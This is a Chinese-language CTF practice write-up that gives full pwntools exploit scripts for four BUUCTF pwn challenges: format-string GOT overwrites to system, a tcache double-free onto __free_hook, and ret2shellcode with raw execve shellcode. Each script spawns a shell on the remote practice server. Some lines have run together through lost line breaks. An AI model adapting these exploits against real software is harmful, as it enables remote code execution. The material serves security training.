PWN-PRACTICE-BUUCTF-21
- wdb_2018_2nd_easyfmt
- ciscn_2019_es_1
- axb_2019_fmt64
- x_ctf_b0verfl0w
wdb_2018_2nd_easyfmt
格式化字符串漏洞
第一次printf通过printf_got将printf的实际地址打印出来,计算libc基地址,得到system的实际地址
第二次printf通过printf_got将printf的实际地址改写为system的实际地址,这样之后的printf实际上是执行的system
第三次输入"/bin/sh\x00",即会执行system("/bin/sh\x00")
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level='debug'
#io=process('./wdb_2018_2nd_easyfmt')
io=remote('node4.buuoj.cn',27039)
elf=ELF('./wdb_2018_2nd_easyfmt')
libc=ELF('./libc-2.23-16-x32.so')
printf_got=elf.got["printf"]
payload=p32(printf_got)+"%6$s"
io.sendlineafter("repeater?\n",payload)
printf_addr=u32(io.recvuntil('\xf7')[-4:])
print("printf_addr=="+hex(printf_addr))
libc_base=printf_addr-libc.symbols["printf"]
system_addr=libc_base+libc.symbols['system']
print("system_addr=="+hex(system_addr))
payload=fmtstr_payload(6,{printf_got:system_addr})
io.sendline(payload)
io.sendline('/bin/sh\x00')
io.interactive()
ciscn_2019_es_1
tcache
参考:ciscn_2019_es_1
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./ciscn_2019_es_1")
io=remote("node4.buuoj.cn",28810)
elf=ELF("./ciscn_2019_es_1")
libc=ELF("./libc-2.27-18-x64.so")def add(name_size,name,com_call):io.sendlineafter("choice:","1")io.sendlineafter("the size of compary's name\n",str(name_size))io.sendlineafter("input name:\n",name)io.sendlineafter("input compary call:\n",com_call)
def show(index):io.sendlineafter("choice:","2")io.sendlineafter("input the index:\n",str(index))
def free(index):io.sendlineafter("choice:","3")io.sendlineafter("input the index:",str(index))
def exit():io.sendlineafter("choice:","4")#gdb.attach(io)
#pause()add(0x410,"aaaa","130")#0
add(0x28,"bbbb","131")#1
add(0x68,"/bin/sh\x00","132")#2#pause()free(0)#pause()show(0)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-96-0x10-libc.sym["__malloc_hook"]
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]#pause()free(1)#pause()free(1)#pause()add(0x28,p64(free_hook),"133")#3#pause()add(0x28,"dddd","134")#4#pause()add(0x28,p64(system),"135")#5#pause()free(2)#pause()io.interactive()
axb_2019_fmt64
格式化字符串漏洞,参考:[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./axb_2019_fmt64")
io=remote("node4.buuoj.cn",26526)
elf=ELF("./axb_2019_fmt64")
libc=ELF("./libc-2.23-16-x64.so")
strlen_got=elf.got["strlen"]io.recvuntil("Please tell me:")
payload="%9$saaaa"+p64(strlen_got)
io.sendline(payload)
strlen_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("strlen_addr=="+hex(strlen_addr))
libc_base=strlen_addr-libc.sym["strlen"]
system=libc_base+libc.sym["system"]
print("system=="+hex(system))
high_sys=(system>>16)&0xff
low_sys=system&0xffffio.recvuntil("Please tell me:")
payload="%"+str(high_sys-9)+"c%12$hhn"
payload+="%"+str(low_sys-high_sys)+"c%13$hn"
#print(len(payload))#25
payload=payload.ljust(32,"a")
print(len(payload))#32
payload+=p64(strlen_got+2)+p64(strlen_got)#12 13
io.sendline(payload)io.recvuntil("Please tell me:")
io.sendline(";/bin/sh\x00")
io.sendline("cat flag")io.interactive()
x_ctf_b0verfl0w
32位elf,NX disabled,堆栈可执行
栈溢出,通过移动栈顶指针esp,实现ret2shellcode
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level='debug'
#io=process('./x_ctf_b0verfl0w')
io=remote('node4.buuoj.cn',27191)
elf=ELF('./x_ctf_b0verfl0w')
jmp_esp=0x08048504
shellcode="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
payload=shellcode.ljust(0x24,'a')
payload+=p32(jmp_esp)
payload+=asm('sub esp, 0x28;jmp esp')
io.recvuntil('name?\n')
io.sendline(payload)
io.interactive()
)
)
